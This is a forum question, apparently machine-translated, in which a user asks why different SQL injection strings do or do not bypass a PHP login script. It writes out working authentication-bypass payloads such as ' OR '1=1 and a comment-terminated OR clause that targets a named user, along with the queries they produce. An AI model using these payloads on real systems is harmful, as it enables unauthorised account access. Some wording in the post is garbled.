I don't understand the sql syntax problems that I get when I launch an injection attack, so any help explaining them is very much appreciated. I have a target php login script that takes a combination of username and password and then it starts very simply.
Select * FROM users WHERE username='$username' AND password='$password'
When will I put the main
$username = ' OR '1=1 $password = ' OR '1=1
the system registers me as admin because it calculates
Select * FROM users WHERE username='' OR '1=1' AND password='' OR '1=1'
and gets the match for the first user record in the database (admin). Now I'm trying to get the script to register me as an arbitrary user named adrian. My thought was to supply
$username = adrian $password = ' OR (1=1 AND username='adrian') --
which I thought would be rated as
Select * FROM users WHERE username='adrian' AND password='' OR (1=1 AND username='adrian')
I thought the logical order of operations is left to the right when parentheses are not specified:
Select * FROM users WHERE [[[username='adrian'] AND password=''] OR (1=1 AND username='adrian')]
but it does not register me like no one (and does not give me any errors). Even if AND is evaluated last, this statement will be evaluated as
Select * FROM users WHERE [username='adrian'] AND [password='' OR (1=1 AND username='adrian')]
This will still be true for the adrian user. In the same time
$username = adrian $password = 'or(1=1 and username='adrian') --
registers me as adrian correctly that evaluates
Select * FROM users WHERE username='adrian' AND password=''or(1=1 AND username='adrian')
So, why does my OR approach fail when my approach or works?
RESOLVED: Thanks for the guidance. Now I understand sql better, but my real problem was that autocomplete removed spaces after the "-" I must have gone bad for the first time, and then stupidly relied on autocomplete since
